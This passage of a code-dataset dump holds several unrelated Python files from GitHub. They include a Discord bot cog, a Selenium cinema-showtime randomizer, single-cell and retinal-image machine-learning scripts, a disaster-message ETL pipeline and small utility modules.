fh, DontExitF=True, WarningF=False)\n error_msg(\"the alternative '%s' has already been defined.\" % B,\n filename, line_n)\n\n if Name == \"on_dedent\" and Mode.events.has_key(\"on_n_dedent\"):\n fh.seek(pos)\n code = Mode.events[\"on_n_dedent\"]\n if code.get_code() != \"\":\n error_dedent_and_ndedent(code, \"on_dedent\", \"on_n_dedent\")\n \n if Name == \"on_n_dedent\" and Mode.events.has_key(\"on_dedent\"):\n fh.seek(pos)\n code = Mode.events[\"on_dedent\"]\n if code.get_code() != \"\":\n error_dedent_and_ndedent(code, \"on_n_dedent\", \"on_dedent\")\n \ndef __validate_required_token_policy_queue(Name, fh, pos):\n \"\"\"Some handlers are better only used with token policy 'queue'.\"\"\"\n\n if Name not in [\"on_entry\", \"on_exit\", \n \"on_indent\", \"on_n_dedent\", \"on_dedent\", \"on_nodent\", \n \"on_indentation_bad\", \"on_indentation_error\", \n \"on_indentation\"]: \n return\n if Setup.token_policy == \"queue\":\n return\n if Setup.warning_disabled_no_token_queue_f:\n return\n\n fh.seek(pos)\n error_msg(\"Using '%s' event handler, while the token queue is disabled.\\n\" 
% Name + \\\n \"Use '--token-policy queue', so then tokens can be sent safer\\n\" + \\\n \"from inside this event handler. Disable this warning by command\\n\"\n \"line option '--no-warning-on-no-token-queue'.\", fh, DontExitF=True) \n","repo_name":"liancheng/rose","sub_path":"external/quex-0.63.2/quex/input/files/mode.py","file_name":"mode.py","file_ext":"py","file_size_in_byte":45752,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"36234972026","text":"import datetime\nimport logging\n\nfrom sqlalchemy import update\n\nfrom discord import Colour, Embed\nfrom discord.ext.commands import Bot, Cog, command, has_permissions, MissingPermissions\n\nfrom utils.checks import is_admin\nfrom utils.database.db_functions import db_edit, cache_prefixes\nimport utils.database as tables\n\nlog = logging.getLogger('bot.' + __name__)\n\n\nclass SpecialCog(Cog, name='Special'):\n \"\"\"Miscellaneous commands.\"\"\"\n def __init__(self, bot: Bot):\n self.bot = bot\n self.config = self.bot.config\n\n @Cog.listener()\n async def on_guild_join(self, guild):\n code = tables.guild_settings.insert().values()\n data = {\n 'guild_id': guild.id,\n 'prefix': self.config[\"prefix\"]\n }\n await db_edit(code, data)\n tavern_support = self.bot.get_guild(546007130902233088)\n channel = tavern_support.get_channel(573945620482490378)\n await channel.send(f'**{guild.name}** guild has invited the Tavern Bot.')\n\n @Cog.listener()\n async def on_guild_remove(self, guild):\n table = tables.guild_settings\n guild_id = guild.id\n code = table.delete().where(table.c.guild_id == guild_id)\n await db_edit(code)\n tavern_support = self.bot.get_guild(546007130902233088)\n channel = tavern_support.get_channel(573945620482490378)\n await channel.send(f'**{guild.name}** guild has removed the Tavern Bot.')\n\n @command(name='invite')\n async def invite_command(self, ctx):\n \"\"\"Invite the bot to your discord server.\"\"\"\n log.debug('Sending an invite link for the bot to {ctx.guild}.')\n invite_embed = Embed(\n title='Invite link for The Tavern Bot',\n description=self.config['invite'],\n colour=Colour.blurple())\n invite_embed.set_footer(text='Use ;help to get a list of available commands.')\n await ctx.send(embed=invite_embed)\n\n @command(name='status')\n async def status_command(self, ctx):\n \"\"\"Get the current status of the bot.\"\"\"\n status_embed = Embed(\n title='Status',\n colour=Colour.blurple())\n members = len(list(self.bot.get_all_members()))\n uptime = datetime.datetime.now() - self.bot.start_time\n uptime = datetime.timedelta(days=uptime.days, seconds=uptime.seconds)\n date = 'Created on 18-11-2018'\n status_embed.description = '\\n'.join(\n [f'Bot up and running in {len(self.bot.guilds)} guilds with {members} members.',\n f'Uptime: {uptime}\\n{date}'\n ]\n )\n status_embed.set_footer(text='Use ;help to get a list of available commands.')\n await ctx.send(embed=status_embed)\n\n @command(name='basic', aliases=['srd'])\n async def basic_rules(self, ctx):\n \"\"\"Link to the basic rulebook for D&D 5e.\"\"\"\n basic_embed = Embed(\n description='**The basic rules for Dungeons and Dragons can be found at the following link:\\n'\n 'http://media.wizards.com/2018/dnd/downloads/DnD_BasicRules_2018.pdf',\n colour=Colour.blurple())\n basic_embed.set_footer(text='Use ;help to get a list of available commands.')\n await ctx.send(embed=basic_embed)\n\n @is_admin()\n @command(name='dbappend', hidden=True)\n async def append_to_db(self, ctx):\n \"\"\"\n Ensures all 
guilds that the Bot is currently in are added to the Guilds database..\n \"\"\"\n guilds_added = 0\n db_code = tables.guild_settings.insert().values()\n for g in self.bot.guilds:\n data = {\n 'guild_id': g.id,\n 'prefix': self.config['prefix']\n }\n db_is_edited = await db_edit(db_code, data)\n if db_is_edited:\n guilds_added += 1\n else:\n pass # An error is already passed by the db_edit function\n await ctx.send(f'{guilds_added} guilds added to the Guilds database.')\n\n @has_permissions(manage_server=True)\n @command(name='prefix')\n async def change_prefix(self, ctx, new_prefix):\n \"\"\"Use this command to change the prefix of your bot.\"\"\"\n table = tables.guild_settings\n data = {'prefix': new_prefix}\n db_is_edited = await db_edit(update(table).where(table.c.guild_id == ctx.guild.id).values(), data)\n if db_is_edited:\n await cache_prefixes()\n await ctx.send(f\"Prefix has been changed to {new_prefix}\")\n else:\n await ctx.send(f\"Prefix could not be changed to {new_prefix}\")\n\n @change_prefix.error\n async def on_change_prefix_error(self, ctx, error):\n if isinstance(error, MissingPermissions):\n return await ctx.send(f'Could not change the prefix for the server.\\n{error}')\n\n @command(name='help')\n async def new_help(self, ctx, second_help: str = None):\n \"\"\"\n Show this message\n \"\"\"\n embed = Embed(\n title=':regional_indicator_h: :regional_indicator_e: :regional_indicator_l: :regional_indicator_p: ',\n colour=0x68c290\n )\n cmd_names = [cmd.name for cmd in self.bot.commands]\n cogs = sorted([cog for cog in self.bot.cogs.keys() if cog not in ['Tavern', 'ErrorHandler']])\n if not second_help:\n for cog_name in cogs:\n cog = self.bot.get_cog(cog_name)\n commands = [cmd for cmd in cog.get_commands() if not cmd.hidden]\n message = f'{cog.description}\\nCommands under this category:\\n'\n for cmd in commands:\n message += f'**{self.config[\"prefix\"]}{cmd.name}: ** *{cmd.help[0:40]}...*\\n'\n embed.add_field(name=cog_name, value=message, inline=False)\n embed.add_field(name='Support Server', value='https://discord.gg/UJPzg8x', inline=False)\n embed.set_footer(text=f\"Use {self.config['prefix']}help (category)/(command) for more information.\")\n else:\n cogs_lowercase = [cog.lower() for cog in cogs]\n if second_help in cogs_lowercase:\n index = cogs_lowercase.index(second_help)\n cog = self.bot.get_cog(cogs[index])\n commands = [command for command in cog.get_commands() if command.hidden is not True]\n message = f'{cog.description}\\nCommands under this category:\\n'\n for cmd in commands:\n name = cmd.name\n message += f'**{self.config[\"prefix\"]}{name} :** {cmd.help[0:40]}\\n'\n embed.add_field(name=cogs[index], value=message + '**', inline=False)\n elif second_help.lower() in cmd_names:\n cmd = self.bot.get_command(second_help)\n embed.add_field(name=cmd.name, value=cmd.help, inline=False)\n value = ''\n if cmd.aliases:\n for alias in cmd.aliases:\n value += f'{str(alias)}, '\n value = value[0:-2]\n value = value + '.'\n else:\n value = None\n embed.add_field(name=\"Aliases\", value=f'*{value}*', inline=False)\n params_list = list(cmd.params.keys())\n req_params = []\n for value in params_list:\n req_params.append(value)\n req_params.remove('self')\n req_params.remove('ctx')\n param_message = 'Required parameters are:\\n**'\n if req_params:\n for parm in req_params:\n param_message += parm + '\\n'\n embed.add_field(name='Usage', value=param_message + '**', inline=False)\n else:\n embed.add_field(name='Usage', value=param_message + 'None**', inline=False)\n\n 
else:\n return await ctx.send(f\"{str(second_help)} command/category does not exist!\")\n await ctx.send(embed=embed)\n\n @is_admin()\n @command(name='hiddencmds', aliases=['hiddens'], hidden=True)\n async def show_hidden_commands(self, ctx):\n \"\"\"View hidden commands.\"\"\"\n embed = Embed(\n title='Hidden Commands',\n description='\\n'.join([f'**{c.name}** - {c.help}' for c in self.bot.commands if c.hidden]),\n colour=0x68c290)\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(SpecialCog(bot))\n log.debug('Loaded')\n","repo_name":"Refisio/rewrite","sub_path":"cogs/specialcog.py","file_name":"specialcog.py","file_ext":"py","file_size_in_byte":8461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"33799131390","text":"#!/usr/bin/python3\n\"\"\"Checks if object is an instance of specified class\"\"\"\n\n\ndef is_kind_of_class(obj, a_class):\n \"\"\"Returns True if object is an instance of specified class, else Flase\"\"\"\n\n if type(obj) is a_class or isinstance(obj, a_class):\n return(True)\n else:\n return(False)\n","repo_name":"CodeSlayer123/holbertonschool-higher_level_programming","sub_path":"0x0A-python-inheritance/3-is_kind_of_class.py","file_name":"3-is_kind_of_class.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35504343818","text":"import argparse\nimport logging\n\nimport anndata as ad\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nimport yaml # type: ignore\nfrom lab_scripts.data import dataloader\nfrom lab_scripts.mains.mp import model as mp_model\nfrom lab_scripts.mains.mp import preprocessing, tune\nfrom lab_scripts.mains.mp.preprocessing import (base_checkpoint_path,\n base_config_path)\nfrom lab_scripts.utils import utils\nfrom pytorch_lightning.callbacks import LearningRateMonitor\nfrom pytorch_lightning.loggers import WandbLogger\nfrom scipy.sparse import csr_matrix\n\nlog = logging.getLogger(\"mp\")\n\n\ndef predict_submission(\n input_train_mod1: ad.AnnData,\n input_train_mod2: ad.AnnData,\n input_test_mod1: ad.AnnData,\n resources_dir: str = \"\",\n) -> ad.AnnData:\n log.info(\"Start MP prediction...\")\n\n # Load data\n mod1 = utils.get_mod(input_train_mod1)\n mod2 = utils.get_mod(input_train_mod2)\n log.info(\"Data is loaded\")\n\n # Select data type\n task_type = utils.get_task_type(mod1, mod2)\n \n predictions = predict(\n input_train_mod1,\n input_train_mod2,\n input_test_mod1,\n task_type,\n resources_dir,\n )\n \n # Convert matrix into csr_matrix (is needed for submission)\n predictions = csr_matrix(predictions)\n\n # Create AnnData object\n result = ad.AnnData(\n X=predictions,\n obs=input_test_mod1.obs,\n var=input_train_mod2.var,\n uns={\"dataset_id\": input_train_mod1.uns[\"dataset_id\"]},\n )\n return result\n\n\ndef predict(\n input_train_mod1: ad.AnnData,\n input_train_mod2: ad.AnnData,\n input_test_mod1: ad.AnnData,\n task_type: str,\n resources_dir,\n):\n config_path = resources_dir + base_config_path + task_type + \".yaml\"\n with open(config_path, \"r\") as f:\n config = yaml.safe_load(f)\n\n model_config = config[\"model\"]\n data_config = config[\"data\"]\n dataset = {\n \"train_mod1\": input_train_mod1,\n \"train_mod2\": input_train_mod2,\n \"test_mod1\": input_test_mod1,\n }\n preprocessed_data = preprocessing.preprocess_data(\n data_config, dataset, mode=\"test\", resources_dir=resources_dir\n )\n\n test_dataloader = 
preprocessed_data[\"test_dataloader\"]\n second_test_inverse = preprocessed_data[\"second_test_inverse\"]\n\n # Add input feature size\n model_config = preprocessing.update_model_config(config, preprocessed_data)\n log.info(\"Data is preprocessed\")\n\n # Load model\n checkpoint_path = (\n resources_dir + base_checkpoint_path + data_config[\"task_type\"] + \".ckpt\"\n )\n model = mp_model.Predictor.load_from_checkpoint(\n checkpoint_path, config=model_config\n )\n log.info(f\"Model is loaded from {checkpoint_path}\")\n\n model.eval()\n second_pred = []\n with torch.no_grad():\n for i, batch in enumerate(test_dataloader):\n prediction = model.predict_step(batch, i)\n second_pred.append(prediction.cpu())\n second_pred = torch.cat(second_pred, dim=0) # type: ignore\n second_pred = second_test_inverse(second_pred)\n return second_pred # type: ignore\n\n\ndef get_logger(config):\n pl_logger = None\n if config[\"wandb\"]:\n pl_logger = WandbLogger(\n project=\"mp_\" + config[\"data\"][\"task_type\"],\n log_model=False, # type: ignore\n config=config,\n tags=[],\n config_exclude_keys=[\"wandb\"],\n )\n pl_logger.experiment.define_metric(name=\"train_m\", summary=\"min\")\n pl_logger.experiment.define_metric(name=\"test_m\", summary=\"min\")\n return pl_logger\n\n\ndef get_callbacks(\n preprocessed_data: dict, dataset: dict, model_config: dict, logger=None\n):\n small_idx = preprocessed_data[\"small_idx\"]\n train_callback = mp_model.TargetCallback(\n preprocessed_data[\"small_train_dataloader\"],\n preprocessed_data[\"small_train_inverse\"],\n dataset[\"train_mod2\"][small_idx],\n prefix=\"train\",\n )\n callbacks = [train_callback]\n\n if \"val_dataloader\" in preprocessed_data:\n val_callback = mp_model.TargetCallback(\n preprocessed_data[\"val_dataloader\"],\n preprocessed_data[\"second_val_inverse\"],\n dataset[\"val_mod2\"],\n prefix=\"val\",\n )\n callbacks.append(val_callback)\n\n test_callback = mp_model.TargetCallback(\n preprocessed_data[\"test_dataloader\"],\n preprocessed_data[\"second_test_inverse\"],\n dataset[\"test_mod2\"],\n prefix=\"test\",\n )\n callbacks.append(test_callback)\n\n if model_config[\"do_tsne\"]:\n tsne_callback = mp_model.BatchEffectCallback(\n train_dataset=preprocessed_data[\"train_unshuffled_dataloader\"],\n test_dataset=preprocessed_data[\"test_dataloader\"],\n frequency=model_config[\"tsne_frequency\"],\n )\n callbacks.append(tsne_callback)\n\n if logger is not None:\n learning_rate_monitor = LearningRateMonitor(\n logging_interval=\"step\",\n )\n callbacks.append(learning_rate_monitor)\n return callbacks\n\n\ndef train(config: dict):\n # Load data\n data_config = config[\"data\"]\n dataset = dataloader.load_custom_mp_data(\n task_type=data_config[\"task_type\"],\n train_batches=data_config[\"train_batches\"],\n test_batches=data_config[\"test_batches\"],\n val_size=data_config[\"val_size\"],\n )\n log.info(\"Data is loaded\")\n\n # Preprocess data\n preprocessed_data = preprocessing.preprocess_data(\n data_config, dataset, mode=\"train\"\n )\n model_config = preprocessing.update_model_config(config, preprocessed_data)\n if model_config[\"total_correction_batches\"] > 0:\n train_dataloaders = [preprocessed_data[\"train_shuffled_dataloader\"]]\n train_dataloaders.extend(preprocessed_data[\"correction_dataloaders\"])\n else:\n train_dataloaders = preprocessed_data[\"train_shuffled_dataloader\"]\n log.info(\"Data is preprocessed\")\n\n # Configure training\n pl_logger = get_logger(config)\n callbacks = get_callbacks(preprocessed_data, dataset, model_config, 
pl_logger)\n\n # Train model\n model = mp_model.Predictor(model_config)\n if pl_logger:\n pl_logger.watch(model)\n\n trainer = pl.Trainer(\n gpus=1,\n max_epochs=5000,\n logger=pl_logger,\n callbacks=callbacks,\n deterministic=True,\n checkpoint_callback=False,\n gradient_clip_val=model_config[\"gradient_clip\"]\n if not model_config[\"use_critic\"]\n else 0.0,\n )\n trainer.fit(model, train_dataloaders=train_dataloaders)\n\n # Save model\n checkpoint_path = config.get(\n \"checkpoint_path\", base_checkpoint_path + data_config[\"task_type\"] + \".ckpt\"\n )\n trainer.save_checkpoint(checkpoint_path)\n log.info(f\"Model is saved to {checkpoint_path}\")\n\n if model.use_vi_dropout:\n weights_path = base_checkpoint_path + \"genes.csv\"\n weights = model.vi_dropout.weight.detach().cpu().numpy()\n np.savetxt(weights_path, weights, delimiter=\",\")\n log.info(f\"Genes weights are saved to {weights_path}\")\n\n\ndef get_parser():\n \"\"\"Creates parser.\n\n Remove lines with adding config, if you don't need it.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Modality Prediction\")\n subparsers = parser.add_subparsers(dest=\"action\")\n\n parser_train = subparsers.add_parser(\"train\")\n parser_train.add_argument(\"config\", type=argparse.FileType(\"r\"))\n parser_train.add_argument(\"--wandb\", action=\"store_true\", default=False)\n parser_tune = subparsers.add_parser(\"tune\")\n parser_tune.add_argument(\"config\", type=argparse.FileType(\"r\"))\n return parser\n\n\ndef cli():\n \"\"\"Runs Command-Line Interface.\"\"\"\n parser = get_parser()\n args = parser.parse_args()\n\n # Read yaml config into dict\n config = yaml.safe_load(args.config)\n\n if args.action == \"train\":\n config[\"wandb\"] = args.wandb\n train(config)\n elif args.action == \"tune\":\n tune.tune_hp(config)\n else:\n print(\"Enter command [train, evaluate, tune]\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n utils.set_deafult_seed()\n cli()\n","repo_name":"SteshinSS/NeurIPS2021","sub_path":"lab_scripts/mains/mp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18143543809","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\nfrom random import choice, randint\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport random\n\n\ndef randomizeCC(driver, element): #Randomize the City and Complex\n option = driver.find_element(*element)\n options = option.find_elements(By.TAG_NAME, 'option')[1:]\n final_rand = choice(options).text\n printing = Select(option)\n printing.select_by_visible_text(final_rand)\n return final_rand\n\n\ndef randomizeMH(driver): #Randomize the Movie and Hour\n links = driver.find_elements(By.TAG_NAME, 'time')\n specific_text = 'locationHide'\n filtered_links = []\n\n for link in links:\n divs = link.find_elements(By.XPATH, './ancestor::div')\n divs_with_specific_text = [div for div in divs if specific_text in div.get_attribute('class')]\n\n if not divs_with_specific_text:\n filtered_links.append(link)\n\n if filtered_links:\n random_index = random.randint(0, len(links) - 1)\n selected_link = links[random_index]\n #selected_link.click()\n\n for attempt in range(len(links)):\n try:\n element = WebDriverWait(driver, .1).until(EC.element_to_be_clickable(selected_link))\n element.click()\n break\n\n except 
Exception as e:\n print(f\"Attempt {attempt + 1}: No clickable button\")\n\n ad_element = (By.ID, 'dismiss-button')\n\n try:\n ad = WebDriverWait(driver, 30).until(EC.visibility_of_element_located(ad_element))\n\n if ad.is_displayed():\n ad.click()\n else:\n print(\"The element is not visible after waiting.\")\n pass\n except:\n pass\n","repo_name":"RobertoLL07/cinepolis","sub_path":"utilities/randomize.py","file_name":"randomize.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2206888973","text":"from Analytics import agg_colors\nfrom Visu import build, common\nfrom Visu import create_html\n\ndef get_stats(data, event):\n data = data[data['Name'] == event]\n return [data['duration'].sum(), round(data['duration'].mean(),2), round(data['duration'].std(),2)]\n\ndef main(data):\n # Get data to plot\n data = agg_colors.get_lavender(data)\n data_prep = common.prepare_data(data)\n freqName = data_prep[['Name']].value_counts().to_frame().reset_index()\n\n # Genarete the plots and its filename, description and title\n plots_names = ['streaming_day_bar', 'streaming_nameDay_bar']\n plots_title = ['General daily frequency', 'Day of the week frequency']\n plots_desc = ['', '']\n build.bar(data_prep, 'day', plots_names[0], ['Name','start_time'])\n build.bar(data_prep, 'name_day', plots_names[1], ['Name','start_time'])\n\n # Get the complete html plot\n html_freq = '
Frequency    '\n    for i in range(freqName.shape[0]):\n        stats = get_stats(data_prep, freqName.iloc[i,0])\n        html_freq += '
  • ' + freqName.iloc[i,0] + ' happens ' + \\\n            str(freqName.iloc[i,1]) + ' times - total of '+str(stats[0])+' hours '+ \\\n            ' - avg of '+str(stats[1])+' and std of '+str(stats[2])+'  • '\n    html_freq += ''\n    html_plots = create_html.plots(plots_names, plots_title, plots_desc)\n    html = '''\n
Streaming Events\nEvents related with TV rsrsr
\n ''' + html_freq + html_plots\n\n return html","repo_name":"salomaoalves/DataScience_Visualization","sub_path":"GCalendar/Visu/streaming_events.py","file_name":"streaming_events.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40490656856","text":"import numpy as np\nfrom PIL import Image\nimport cv2\nfrom random import randrange\nfrom torchvision import transforms\nimport matplotlib.pyplot as plt\n\ndef transform(image, mask=None, size=None):\n image = image.convert('L')\n image = cut_to_spin(image)\n\n if mask is not None:\n image, mask = rotate(image, mask)\n mask = cut_to_spin(mask)\n\n image = np.array(image)\n # image = histo_equalized(image)\n image = clahe_equalized(image)\n image = adjust_gamma(image, 1.2)\n\n #image = transforms.ToTensor()(image)\n if mask is not None:\n #mask = np.array(mask)\n #verify(image, mask)\n #mask = transforms.ToTensor()(mask)\n \n return [image, mask]\n else:\n return image\n\ndef image2gray(image):\n img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n return img_gray\n\ndef dataset_normalized(imgs):\n imgs_normalized = np.empty(imgs.shape)\n imgs_std = np.std(imgs)\n imgs_mean = np.mean(imgs)\n imgs_normalized = (imgs-imgs_mean)/imgs_std\n imgs_normalized = ((imgs_normalized - np.min(imgs_normalized)) / (np.max(imgs_normalized)-np.min(imgs_normalized)))*255\n return imgs_normalized\n\ndef histo_equalized(imgs):\n imgs_equalized = np.empty(imgs.shape)\n imgs_equalized = cv2.equalizeHist(np.array(imgs, dtype = np.uint8))\n return imgs_equalized\n\ndef clahe_equalized(imgs):\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\n imgs_equalized = np.empty(imgs.shape)\n imgs_equalized = clahe.apply(np.array(imgs, dtype = np.uint8))\n return imgs_equalized\n\ndef adjust_gamma(imgs, gamma=1.0):\n invGamma = 1.0 / gamma\n table = np.array([((i / 255.0) ** invGamma) * 255 for i in np.arange(0, 256)]).astype(\"uint8\")\n new_imgs = np.empty(imgs.shape)\n new_imgs = cv2.LUT(np.array(imgs, dtype = np.uint8), table)\n return new_imgs\n\ndef rotate(image, mask):\n func = [\"false\", Image.FLIP_LEFT_RIGHT, Image.FLIP_TOP_BOTTOM, Image.ROTATE_90, Image.ROTATE_180, Image.ROTATE_270]\n get_idx = randrange(len(func))\n \n if func[get_idx] != \"false\":\n #print(mask.shape)\n image = image.transpose(func[get_idx])\n mask = mask.transpose(func[get_idx])\n \n return [image, mask]\n\ndef cut_to_spin(image):\n x, y = image.size\n remaining = abs(x - y) // 2\n if x < y:\n image = image.crop((0, remaining, x, y-remaining))\n else:\n image = image.crop((remaining, 0, x-remaining, y))\n\n x, y = image.size\n\n if x < y:\n image = image.crop((0, 0, x, y - 1))\n elif x > y:\n image = image.crop((0, 0, x - 1, y))\n\n return image\n\ndef verify(image, mask):\n out = cv2.subtract(image.copy(), mask.copy())\n plt.figure()\n plt.title(\"verify\")\n plt.imshow(out, cmap='gray')\n plt.show()\n\n'''\n\nif __name__ == \"__main__\":\n image = cv2.imread(\"./dataset/DRIVE/training/images/21_training.tif\")\n mask = cv2.imread(\"./dataset/DRIVE/training/1st_manual/21_manual1.gif\")\n\n image, mask = spin(image, mask)\n print(mask.shape)\n\n cv2.imshow(\"image\", image)\n cv2.imshow(\"image2\", mask)\n\n 
cv2.waitKey(0)\n'''","repo_name":"carlylezqy/Deep_Learning","sub_path":"Torch_Network/Segmentation/2D_Luxonus_UNet/image_transforms.py","file_name":"image_transforms.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36440097979","text":"import tool\nfrom numpy import *\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.linear_model import Lasso\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.naive_bayes import GaussianNB\n\n\ndef testLogistic():\n logreg = LogisticRegression(C=1)\n trainingset, traininglabels = tool.file2floatMatrix('horseColicTraining.txt', 21)\n testset, testlabels = tool.file2floatMatrix('horseColicTest.txt', 21)\n logreg.fit(trainingset, traininglabels)\n print(\"logreg.coef_: {}\".format(logreg.coef_))\n print(\"logreg.intercept_: {}\".format(logreg.intercept_))\n print(\"Training set score: {:.2f}\".format(logreg.score(trainingset, traininglabels)))\n print(\"Test set score: {:.2f}\".format(logreg.score(testset, testlabels)))\n\n\ndef testSVM():\n svc = LinearSVC(C=50)\n trainingset, traininglabels = tool.file2floatMatrix('horseColicTraining.txt', 21)\n testset, testlabels = tool.file2floatMatrix('horseColicTest.txt', 21)\n svc.fit(trainingset, traininglabels)\n print(\"svc.coef_: {}\".format(svc.coef_))\n print(\"svc.intercept_: {}\".format(svc.intercept_))\n print(\"Training set score: {:.2f}\".format(svc.score(trainingset, traininglabels)))\n print(\"Test set score: {:.2f}\".format(svc.score(testset, testlabels)))\n\n\nif __name__ == '__main__':\n # testSVM()\n testLogistic()\n # testLasso()\n # testOLS()\n","repo_name":"xuhui1231/ml","sub_path":"linearModelWithMglearn.py","file_name":"linearModelWithMglearn.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"29258682914","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\ndef load_data(messages_filepath, categories_filepath):\n \"\"\"\n\n :param messages_filepath: path to the messages csv file\n :param categories_filepath: path to the categories csv file\n :return: messages and categories combined data_frame\n \"\"\"\n message_df = pd.read_csv(messages_filepath)\n categorie_df = pd.read_csv(categories_filepath)\n final_df = pd.merge(message_df, categorie_df, on='id')\n return final_df\n\n\ndef clean_data(df):\n \"\"\"\n\n :param df: combined dataframe made after merging messages and the categories.\n :return: cleaned df\n \"\"\"\n categories_df = df.categories.str.split(';', expand=True) # creating a dataframe of the 36 individual category columns.\n row = categories_df.loc[0, :] # Selecting first row\n category_col_header = row.apply(lambda x: x.split('-')[0]).values # getting different column headers\n categories_df.columns = category_col_header # renaming the columns of `categories`\n\n for column in categories_df:\n # set each value to be the last character of the string\n categories_df[column] = categories_df[column].str.split('-').str[1]\n\n categories_df.apply(pd.to_numeric)\n df.drop('categories', axis=1, inplace=True)\n df = pd.concat([df, categories_df], axis=1)\n return df\n\ndef save_data(df, database_filename):\n \"\"\"\n\n :param df: combined and cleaned dataframe\n :param database_filename: database filepath\n \"\"\"\n db_engine = 
create_engine('sqlite:///{}'.format(database_filename))\n df.to_sql(\"disaster_response\", db_engine, if_exists='replace', index=False)\n\n\n\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()","repo_name":"prast567/Disaster-response-pipeline","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7605396272","text":"import numpy as np\nimport cv2\nimport torch\nfrom imageio import imread\n\n\ndef process_resize(w, h, resize):\n assert(len(resize) > 0 and len(resize) <= 2)\n if len(resize) == 1 and resize[0] > -1:\n scale = resize[0] / max(h, w)\n w_new, h_new = int(round(w*scale)), int(round(h*scale))\n elif len(resize) == 1 and resize[0] == -1:\n w_new, h_new = w, h\n else: # len(resize) == 2:\n w_new, h_new = resize[0], resize[1]\n\n # Issue warning if resolution is too small or too large.\n if max(w_new, h_new) < 160:\n print('Warning: input resolution is very small, results may vary')\n elif max(w_new, h_new) > 2000:\n print('Warning: input resolution is very large, results may vary')\n\n return w_new, h_new\n\n\ndef frame2tensor(frame, device):\n return torch.from_numpy(frame/255.).float()[None, None].to(device)\n\n\ndef get_new_resolution_with_minimum(minSize, I, strideNet):\n h, w = I.shape[:2]\n ratio = min(w / float(minSize), h / float(minSize))\n new_w, new_h = round(w / ratio), round(h / ratio)\n new_w, new_h = new_w // strideNet * strideNet, new_h // strideNet * strideNet\n return new_w, new_h\n\n\ndef read_image(path, device, rotation, resize_float, resize=None, min_size=None, strideNet=8):\n image = imread(str(path))\n if image is None:\n return None, None, None\n\n w, h = image.shape[1], image.shape[0]\n if min_size is not None:\n # it means we need to resize the image keeping aspect ratio so that smallest side is equal to min_size\n w_new, h_new = get_new_resolution_with_minimum(min_size, image, strideNet)\n else:\n w_new, h_new = process_resize(w, h, resize)\n scales = (float(w) / float(w_new), float(h) / float(h_new))\n\n if resize_float:\n image = cv2.resize(image.astype('float32'), (w_new, h_new))\n else:\n image = cv2.resize(image, (w_new, h_new))#.astype('float32')\n\n if rotation != 0:\n image = np.rot90(image, k=rotation).copy()\n # needs the copy for later to be read in torch !\n if rotation % 2:\n scales = scales[::-1]\n\n inp = frame2tensor(image, device)\n return image, inp, scales\n\n\n# --- GEOMETRY ---\ndef estimate_pose(kpts0, kpts1, K0, K1, ransac, thresh, conf=0.99999):\n if len(kpts0) < 5:\n return None\n\n f_mean = np.mean([K0[0, 0], K1[1, 1], K0[0, 0], K1[1, 
